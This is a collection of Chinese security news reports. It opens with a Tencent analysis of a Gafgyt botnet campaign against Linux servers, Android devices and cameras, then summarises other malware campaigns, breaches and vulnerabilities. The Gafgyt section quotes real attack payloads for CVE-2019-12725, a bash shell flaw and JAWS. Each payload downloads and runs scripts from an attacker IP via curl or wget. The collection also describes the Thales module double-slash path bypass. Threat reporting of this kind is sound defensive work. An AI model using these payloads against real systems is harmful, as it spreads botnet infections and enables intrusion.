感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/fUOracfMmKfj5RT2llMVpg   一、背景 腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞（CVE-2019-12725）、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击，攻击成功后下载Gafgyt家族木马。 Gafgyt是一种流行的僵尸网络程序，被认为是Mirai的前身，其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播，通过感染基于Linux的IoT设备（包括基于Linux系统的路由器、智能摄像头等设备）来发起DDoS攻击，攻击类型以UDP、TCP和HTTP攻击为主。   腾讯安全系列产品应对Gafgyt僵尸网络的响应清单： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Gafgyt僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Gafgyt僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）   Gafgyt僵尸网络关联的IOCs已支持识别检测； 2）   检测利用Zeroshell漏洞的命令注入攻击； 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）    已支持查杀Gafgyt僵尸网络相关木马程序； 2）    告警弱口令爆破行为； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）   已支持通过协议检测Gafgyt僵尸网络木马与服务器的网络通信； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、详细分析 腾讯安全专家在日常安全巡检过程中发现攻击线索，腾讯云防火墙检测到攻击来源52.224.202.238:43787，针对目标系统80端口的命令注入攻击。 该攻击的payload为： GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” HTTP/1.0 分析发现这次攻击利用的是ZeroShell远程代码执行漏洞（CVE-2019-12725），该漏洞在2019年7月被发现，攻击者可以通过构造具有固定特征的请求数据发送至目标系统，从而导致恶意代码执行。（ZeroShell是一套用于服务器和嵌入式设备的Linux发行版，它主要为局域网提供所需要的网络服务） 漏洞攻击成功后通过curl命令下载执行shell脚本zero，zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行，分别为64位和32位木马文件。 bot.x86为Gafgyt僵尸网络家族木马样本，启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。 然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。 针对开放端口的设备利用ZeroShell远程代码执行漏洞（CVE-2019-12725）攻击，执行payload: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*“;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” 利用bash shell漏洞攻击，执行payload: shell[:]cd /data/local/tmp; busybox wget http[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -O http[:]//5.206.227.228/curl; sh curl;rm wwww curl 利用JAWS Webserver未授权shell命令执行漏洞攻击，执行Payload: GET /shell?cd /tmp;wget http[:]//5.206.227.228/jaw;sh jaw;   ZeroShell远程代码执行漏洞（CVE-2019-12725）的攻击流量：   IOCs IP 5.206.227.228 URL http[:]//5.206.227.228/zero http[:]//5.206.227.228/curl http[:]//5.206.227.228/wget http[:]//5.206.227.228/k http[:]//5.206.227.228/bot.x86_64 http[:]//5.206.227.228/bot.x86 http[:]//5.206.227.228/bot.arm5 http[:]//5.206.227.228/bot.arm6 http[:]//5.206.227.228/bot.arm7 http[:]//5.206.227.228/bot.aarch64 http[:]//5.206.227.228/bot.mips http[:]//5.206.227.228/bot.mipsel MD5 2520fc7d13ac3876cca580791d1c33a8 cc84fcc23567228337e45c9fbb78699f 10b9f21795e5ffbd52c407617d0bd4ef 38d8de098c7e560a34dabf8c1a2ed5f0 12b021bcd199585e86dd27523010105b 0e12d891a2fe2cecb6781f3e4d3551b4 aa389e7fb64cf274334712ecb3dfd2cd 2dabb8e039a77f0eb67e938d798ab7c4 03a7f039321ffb9938cc67d65c0b6459 a9109419954a421b712d48ea22b0a7b9 52fb891c536fe449b896f0f2cd2490d4 e2cec25584bfec1e56ee82f350dfeaf9 87859507c0d23793c78d86e0963a7a37 ba903efc3d2e37105e57232e7652b85c 891bbf7b562b34332fac12df2c29ddbb 6d9953a03c568ad97595723d1a09b291 aa9e9627ed6aba6415fb45f742f4f8dd 参考链接： https://www.anquanke.com/vul/id/1030688 https://www.tarlogic.com/advisories/zeroshell-rce-root.txt https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ https://github.com/ifding/iot-malware

企业一直是恶意加密矿工团队的首选目标。他们不仅经常操作大量的计算资源（这有助于密码劫持者更快地开采加密货币），而且企业运营的网络对随后的攻击也很有帮助：犯罪分子可能会使用最初的受感染机器作为立足点，从中试图横向移动。在网络中感染更多计算机，并通过新的漏洞和社交工程技术不断调整攻击 “柠檬鸭”（Lemon_Duck）是一个我们见过的十分先进的密码劫持者。它的创建者不断使用新的威胁向量和混淆技术来更新代码，以逃避检测，并且矿工本身是“无文件的”，这意味着它驻留在内存中，并且不会在受害者的文件系统上留下任何痕迹。 在这篇文章中，我分享了有关此活动使用新攻击媒介的信息，以及我在上一则文章中讨论的其余媒介的一些后续工作。 以Covid-19为主题的电子邮件和附件 一些传播垃圾邮件的攻击者通常从重大事件中获利，例如年末假期，各个国家/地区的报税截止日期。因此，柠檬鸭背后的威胁者与许多其他威胁者一样，在大规模垃圾邮件活动中利用了全球对COVID-19大流行的忧虑，使收件人收到恶意附件。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1314/ 消息与封面来源：Sophos   ，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

从本月初开始，Morphisec实验室跟踪了一个大规模的恶意软件活动，该活动提供QakBot / QBot银行木马。Qakbot利用先进的技术来逃避检测并阻止对威胁的人工分析。在这篇文章中，我们将提到其中两种有趣的技术——通过压缩Word文档绕过内容撤防和重建（CDR）技术、绕过子模式检测模式。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1308/ 稿件与封面来源：Morphisec，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

使用一款流行的 iOS 软件开发套件开发的多款应用程序中，发现了能够窃取广告内点击收入的恶意代码。根据网络安全公司 Snyk 发布的报告，在广告平台 Mintegral 的 SDK 中发现了这些恶意代码。而该 SDK 已经被超过 1200 个应用使用，这些应用每月的下载量合计达 3 亿次。 与其他广告相关的 SDK 一样，Mintegral 套无需花费太多精力或进行额外的编码情况下，允许开发者在其应用中嵌入广告。Mintegral在 iOS 和 Android 上都向开发者免费提供了该 SDK。 根据 Snyk 介绍，iOS 版本的软件套件包含恶意功能，会静静地等待用户点击任何不属于Mintegral 网络的广告。当点击注册后，SDK会劫持推荐过程，并使其看起来用户实际上是在点击 Mintegral 广告。 该恶意代码被称之为“SourMint”，正在从其他广告网络中窃取应用收入，许多应用程序使用多个广告SDK来实现其货币化策略的多样化。 苹果在给ZDNet的邮件中表示，已经与Snyk安全研究人员进行了交流，没有看到任何证据表明SDK对用户造成了伤害。苹果指出，第三方SDK能够加入恶意功能，这也是它在2020年晚些时候发布的iOS 14中首次推出一系列注重隐私和安全的机制的原因。     （稿源：cnBeta，封面源自网络）

背景和主要发现 透明部落（又称PROJECTM和MYTHIC LEOPARD）是一个活动频繁的组织，其活动可以追溯到2013年。Proofpoint 在2016年发表了一篇有关他们的很好的文章，从那时起，我们一直关注着。我们已经通过APT威胁情报报告了他们的活动，在过去的四年中，这个APT小组从未休假。他们的目标通常是印度军方和政府人员。 多年来，该小组TTP一直保持一致，不断使用某些工具并为特定的活动创建新的程序。他们最喜欢的感染媒介是带有嵌入式宏的恶意文档，这些文档似乎是由自定义生成器生成的。 他们的主要恶意软件是自定义的.NET RAT，俗称Crimson RAT，但多年来，我们还观察到了其他自定义.NET恶意软件和基于Python的RAT Peppy的使用。 在过去的一年中，我们看到该组织加强了其活动，开始了大规模的感染运动，开发了新的工具并加强了对阿富汗的关注。 我们最近的调查将在两个博客文章中进行介绍。第一部分将涵盖以下关键点： 我们发现了Crimson Server组件，这是Transparent Tribe用来管理受感染机器和进行间谍活动的C2。该工具证实了我们对Crimson RAT的大多数观察结果，并帮助我们了解了攻击者的观点。 透明部落继续传播深红RAT，感染了多个国家（主要是印度和阿富汗）的受害者。 USBWorm组件是真实的，并且已在数百个系统上检测到它。这种恶意软件的存在早在几年前就已被推测出来，但是据我们所知，它从未被公开描述过。     … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1305/ 消息与封面来源：SUCURELIST，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。    

致力于提供高质量免费照片和设计图形访问的网站Freepik今天披露了一起重大安全漏洞。在本周用户开始在社交媒体上抱怨他们的收件箱中收到了违规通知邮件后，该公司正式宣布了这一消息，从而确认了过去几天向注册用户发送的邮件的真实性。 根据该公司的官方声明，此次安全漏洞发生在一名黑客（或多名黑客）利用SQL注入漏洞访问其一个存储用户数据的数据库之后。Freepik表示，黑客获得了其Freepik和Flaticon网站上最老的830万注册用户的用户名和密码。 Freepik没有说明漏洞发生的时间，也没有说明它是何时发现的。不过，该公司表示，在得知这一事件后，立即通知了有关部门，并开始调查这一漏洞以及清点黑客获取的内容。至于被取走的内容，Freepik表示，并不是所有用户的账户都有相关的密码，黑客只取走了部分用户的信息。 该公司将这一数字定为450万，其中包括使用第三方联合登录账户的用户（谷歌、Facebook或Twitter）。 “对于剩下的377万用户，攻击者得到了他们的电子邮件地址和密码的哈希值，”该公司补充道。”散列密码的方法是bcrypt，还有22万9千名用户的方法是saltted MD5。随后，我们已经将所有用户的哈希值更新为bcrypt。” 该公司表示，现在正在根据被采取的措施，用定制的电子邮件通知所有受影响的用户。这些邮件将发给Freepik和Flaticon用户，这取决于用户在什么服务上注册过。Freepik是当今互联网上最受欢迎的网站之一，目前在Alexa百强网站排行榜上排名第97位。Flaticon也不甘落后，排名第668位。 当EQT在今年5月底收购Freepik公司时，该公司宣称Freepik服务拥有超过2000万注册用户。 Freepik公司的另一家网站Slidesgo的注册用户似乎没有受到影响。     （稿源：cnBeta，封面源自网络）

社会对技术的依赖程度非常高，预计到2025年，全球使用的互联网连接设备数量将增长到559亿台。这些设备中的许多设备涵盖了工业控制系统(ICS)的各个部分，它们影响着世界，协助我们在家中的日常生活，并监控和自动化生产工作中从能源使用到机器维护的一切。滥用这些系统的潜力已经引起了网络犯罪分子的注意；根据2020年IBM X-Force威胁情报指数，自2018年以来，针对这些系统的攻击增加了2000%以上。 作为持续研究的一部分，IBM的黑客团队X-Force Red发现了一个新的物联网漏洞，可以被远程利用。制造商泰雷兹自2020年2月起向客户提供了CVE-2020-15858的补丁，X-Force Red一直在合作，以确保用户了解该补丁，并采取措施保护他们的系统。 在今天使用的数十亿智能设备中，泰雷兹是使它们能够连接到互联网、安全存储信息和验证身份的组件的供应商之一。泰雷兹的整个产品组合每年连接超过30亿个设备，从智能能源表到医疗监控设备和汽车，有超过3万家机构依赖其解决方案。 然而，在2019年9月，X-Force Red发现了泰雷兹（原金雅拓）的Cinterion EHS8 M2M模块中的一个漏洞，该模块在过去十年中被用于数百万个互联网连接设备。经过进一步的测试，泰雷兹确认该漏洞会影响到EHS8同一产品线中的其他模块（BGS5、EHS5/6/8、PDS5/6/8、ELS61、ELS81、PLS62），进一步扩大了该漏洞的潜在影响。这些模块是实现物联网设备移动通信的微型电路板。 更重要的是，它们存储和运行的Java代码通常包含密码、加密密钥和证书等机密信息。利用从模块中窃取的信息，恶意行为者有可能控制设备或获得中央控制网络的访问权，从而进行广泛的攻击–在某些情况下甚至可以通过3G远程攻击。利用这个漏洞，攻击者有可能指示智能电表打掉一个城市的电力，甚至给医疗病人注射过量的药物，只要负责这些关键功能的设备使用的是一个暴露在攻击者面前的未打补丁的模块，例如，通过这个模块启用的3G/4G连接。 关于该漏洞 EHS8模块及其系列中的其他模块，旨在通过3G/4G网络实现连接设备之间的安全通信。将该模块视为相当于一个值得信赖的数字锁箱，公司可以在其中安全地存储密码、凭证和操作代码等一系列秘密。这个漏洞破坏了这一功能，允许攻击者窃取组织机密。 X-Force Red发现了一种绕过安全检查的方法，这种检查可以使文件或操作代码对未经授权的用户隐藏起来。这个漏洞可能使攻击者能够入侵数百万台设备，并通过转入提供商的后端网络来访问支持这些设备的网络或VPN。反过来，知识产权(IP)、凭证、密码、加密密钥都可能被攻击者轻易获得。换句话说，模块存储的机密信息可能不再是机密。攻击者甚至可以抢夺应用程序代码，彻底改变逻辑，操纵设备。 潜在的影响是什么？ 这个漏洞的潜在影响根据攻击者可能入侵使用这一行模块的哪些设备而有所不同。据了解，全球有数百万台设备使用该模块，横跨汽车、医疗、能源和电信行业。 鉴于其中许多设备的关键性，有针对性的网络攻击可能会很重要。以下是一些例子，说明如果在各种类型的设备中暴露出未打补丁的模块，攻击者可能会做什么。 医疗设备： 操纵监测设备的读数来掩盖生命体征或制造虚假恐慌 在根据输入提供治疗的设备中，如胰岛素泵，网络犯罪分子可能会使患者用药过量或不足。 能源和公用事业。篡改智能电表，提供伪造的读数，增加或减少每月的账单。通过控制网络访问一大群这些设备，恶意行为者还可以关闭整个城市的电表，造成大范围的停电，需要进行单独维修，甚至更糟糕的是，破坏电网本身。 技术细节 EHS8模块与该系列的其他模块一样，由一个微处理器组成，内嵌Java ME解释器和闪存，以及GSM、GPIO、ADC、数字和模拟音频、GPS、I2C、SPI和USB接口。它还提供了更高层次的通信堆栈，如PPP和IP。嵌入式Java环境允许安装Java “midlet”，以提供可定制的功能和与主机设备的交互，和/或作为主逻辑。该模块在基本的OEM集成商层面上运行时，其行为很像传统的 “Hayes”调制解调器。这意味着，除了加载到系统中的Java应用程序外，还可以通过内置在电路中的物理UART连接使用 “AT “串行命令进行控制。 在安全研究实践中，Java应用程序可以被绕过，并将控制权交还给低层，允许攻击者直接控制模块。一旦控制了AT命令接口，就可以发出大量的标准命令，如 “ATD”–拨号，或 “ATI”–显示制造商信息。还有一些配置命令和用于访问覆盖在闪存上的基本文件系统的特定命令子集–“AT^SFA”。这提供了文件和子目录的读、写、删除和重命名。 为了方便Java环境，还有一些与Java相关的命令，其中一个命令是 “安装 “先前上传到闪存文件系统的Java midlet。这可以有效地将Java代码复制到闪存文件系统中的 “安全存储 “中，理论上是 “只写 “的–即数据可以复制到该存储中，但永远不会被读回。这样一来，OEM厂商包含其IP的私有Java代码，以及任何安全相关的文件，如PKI密钥或证书和应用相关的数据库，都可以防止第三方窃取。 然而，X-Force Red发现的漏洞允许对隐藏区域进行完全的读、写、删除访问（尽管Thales已经针对特定的文件类型进行了额外的检查）。这将允许攻击者读出系统上运行的全部java代码（包括OEM midlets和Thales的主 “主”代码），以及他们可能拥有的任何其他 “隐藏 “支持文件。 由于Java很容易被反转为人类可读的代码，这可能会暴露任何应用程序的完整逻辑以及任何嵌入的 “秘密”，如密码、加密密钥等，并使IP窃取成为一个非常简单的操作。掌握了这些数据，攻击者可以很容易地创建 “克隆 “设备，或者更可怕的是，修改功能以实现欺诈或恶意活动。 带有漏洞的代码列表 上图显示了该漏洞存在于计算路径子串中的字符数并检查第四个字符是否为点（字符数组中的第三个索引）的代码中。在正常情况下，任何访问带有点前缀的隐藏文件的尝试都会被拒绝（例如：a:/.hidden_file）。然而，用双斜线代替斜线（例如：a://.hidden_file）将导致条件失败，代码执行将跳转到一个字符检查循环，该循环将匹配任何可打印字符。在第二个斜线之后，系统将忽略它，没有什么能阻止攻击者使用点前缀的文件名，绕过安全测试条件。 责任披露和补救 泰雷兹公司与X-Force Red团队合作，在2020年2月测试、创建并向其客户分发补丁。 补丁可以通过两种方式管理–通过软件插入USB运行更新，或者通过管理空中（OTA）更新。这个漏洞的补丁过程完全取决于设备的制造商和它的能力，例如，设备是否可以访问互联网，可能会使它的工作变得复杂。另一项需要注意的是，设备越是受监管（医疗设备、工业控制等），应用补丁的难度就越大，因为这样做可能需要重新认证，这往往是一个耗时的过程。 我们要赞扬泰雷兹公司对这一缺陷的处理，并花费大量时间与客户合作，以确保他们了解补丁并采取步骤保护用户的安全。关于CVE-2020-15858的更多信息可以在https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15858页面当中找到。     （稿源：cnBeta，封面源自网络）

在对Twitter 2019年被披露的数据泄露事件处以多少罚款的问题上，欧盟隐私监管机构——爱尔兰数据保护委员会(DPC)内部产生分歧，这可能导致该机构对美国四大科技巨头的调查也出现分歧和延迟。 此案涉及Twitter在2019年1月修复的一个安全漏洞，在此前四年多的时间里，该漏洞暴露了许多用户的私人推文。DPC在其2019年年报中表示，此案的焦点在于Twitter是否履行了及时通知用户发生黑客袭击事件的义务。 DPC周四在一份声明中披露了有关此案存在的分歧，这是对2018年生效的《通用数据保护条例》(GDPR)执法的重大考验之一。这让人担心，根据这项法律，针对Facebook、谷歌、亚马逊以及其他美国科技公司的近20多项调查可能会出现分歧和拖延。 这些调查由DPC牵头，因为上述这些公司都在爱尔兰设有地区总部，但其他26个欧盟国家的相应监管机构可以在涉及它们的案件中提出反对意见。 DPC周四表示，在未能解决对其在Twitter案件中的分歧后，该机构启动了欧盟隐私监管机构之间的争端解决机制，这是该程序首次启动。Twitter案件是个风向标，因为这是DPC第一次将决定草案转发给同行征求意见。 Twitter没有立即回复记者的置评请求。DPC拒绝评论哪些同行反对其拟议的决定，或基于什么理由，但反对意见可能与其机制和罚款金额有关。 根据GDPR规定，监管机构可以对未能在72小时内通知数据泄露事件的公司处以最高相当于其全球年收入2%的罚款，基于Twitter 2019年的收入，罚款金额可能高达6900万美元。然而，该法律指示监管机构考虑违规行为的严重性和持续时间、有争议的个人信息类型以及其他因素，例如违规行为是否是故意的。 Twitter案件的最终结果将为欧盟在监管机构之间的权力分享体系在实践中如何运作提供借鉴。根据这项法律，在涉及多个国家的案件中，主要监管机构（如DPC）会将其决定草案发送给同行。他们有四周的时间提交“相关且合理的”反对意见，还需要有额外的时间来批准基于这些反对意见的修订。 监管机构无法解决的任何分歧都可以提交给欧洲数据保护委员会，该委员会将通过投票决定。这个过程持续一个月，但可以延长到两个月，然后再延长两周。根据法律文本，一旦委员会批准了一项决定，主要监管机构需要在1个月内通知公司。     （稿源：网易科技，封面源自网络）

早在 4 个月前，安全研究员 Allison Husain 就已经向谷歌通报了一个影响 Gmail 或 G Suite 客户的电子邮件欺诈漏洞。遗憾的是，尽管给足了 137 天的时间，谷歌仍选择拖到 9 月份的某个时候再修复这个 Bug 。讽刺的是，在 Allison Husain 将详情公布后不久，谷歌团队就于 7 小时内在服务器端部署了缓解措施，以便能够撑到 9 月的正式修复。 据悉，该漏洞使得攻击者可发送模仿任何 Gmail 或 G Suite 客户的欺骗性电子邮件。 此外 Allison Husain 指出，该 bug 还使得邮件附件能够骗过发件人策略框架（SPF）和基于域的消息身份验证（DMARC）这两项最先进的邮件安全标准。 遗憾的是，搜索巨头在漏洞修复上有些不够积极，甚至一度想拖到 9 月份再正式修复。直到 Allison Husain 于自己的博客上披露了概念验证漏洞代码，谷歌工程师才于昨日改变了主义。 博文上线 7 小时后，谷歌向 Allison Husain 表示，该公司已在服务器端部署了缓解措施。 至于这个 Gmail（G Suite）Bug 本身，实际上是两个因素的结合，首先是攻击者可将欺骗性的电子邮件发送到后端网关。 其次是利用自定义邮件路由规则、以接收传入的电子邮件并将其转发，同时借助变更收件人的本地功能来骗过 Gmail 或 G Suite 客户。 利用此功能转发的好处是，Gmail / G Suite 会遵从 SPF 和 DMARC 安全标准来验证欺骗性转发的电子邮件。因源于 Google 后端，其垃圾邮件评分也可能较低，从而减少了被过滤系统拦截的可能。 Allison Husain 指出，这两个 bug 都是谷歌独有，如果漏洞未得到及时修补，其很有可能被恶意邮件发送者滥用。庆幸的是，通过在服务器端部署缓解措施，用户这边无需执行任何附加操作。     （稿源：cnBeta，封面源自网络）

本周四，Uber前首席安全官约瑟夫·沙利文（Joseph Sullivan）受到刑事指控，罪名是试图隐瞒2016年的一次黑客攻击。当时的攻击导致Uber大约5700万用户和司机的个人信息泄露。值得注意的是，这样的诉讼尚没有先例。 美国司法部指控52岁的沙利文犯有妨碍司法公正的重罪。诉讼称，在黑客攻击发生后，美国联邦贸易委员会（FC）开始监督Uber的信息安全工作，但他采取“蓄意的措施”，妨碍FTC了解相关信息。 这起案件是企业的信息安全人员首次被指控隐瞒黑客攻击活动。 沙利文本人曾是美国联邦检察官。他根据Uber的信息安全研究者漏洞报告奖励计划，向黑客支付了10万美元。到目前为止，这是Uber奖励计划支付的最高奖金，但这一项目原本并不覆盖敏感数据被盗事件。 沙利文此前曾是Facebook的信息安全负责人，目前在Cloudflare担任首席信息安全官。 在此前的采访中，信息安全人员表示，Uber支付这笔钱是为了迫使黑客公开接受奖金，并确保数据，尤其是平台司机的驾照信息被销毁。 起诉书称，沙利文让黑客签署了保密协议，谎称他们没有窃取数据。此外，Uber时任CEO的特拉维斯·卡兰尼克（Travis Kalanick）知晓沙利文的行为。 卡兰尼克的发言人拒绝对此置评。沙利文的发言人表示，沙利文正在与同事就本案展开合作，具体信息由司法部门披露。 沙利文的发言人布拉德·威廉姆斯（Brad Williams）说：“如果不是沙利文和他团队的努力，很可能我们永远都不会知道，什么人应该为此事件负责。” 卡兰尼克的继任者、Uber现任CEO达拉·科斯罗沙西（Dara Khosrowshahi）披露了这笔奖金，并在确定违规程度后辞退了沙利文及他的副手。Uber随后支付1.48亿美元，以了结在美国所有50个州和华盛顿特区遭遇的指控。 对于许多与黑客直接打交道的公司来说，Uber这起案件非常值得关注。许多公司都制定了类似的漏洞报告奖励计划，这些计划通常被视为提高信息安全水平的工具，并为黑客提供法律框架内的奖励。然而，有些参与者并没有遵守规则。 美国联邦调查局（FBI）指出，在Uber的案件中，两名主要的黑客继续攻击其他公司。如果沙利文首先报告司法部门，那么这种情况本可以避免。这两名黑客已经认罪，正在等待法庭判决。     （稿源：新浪科技，封面源自网络）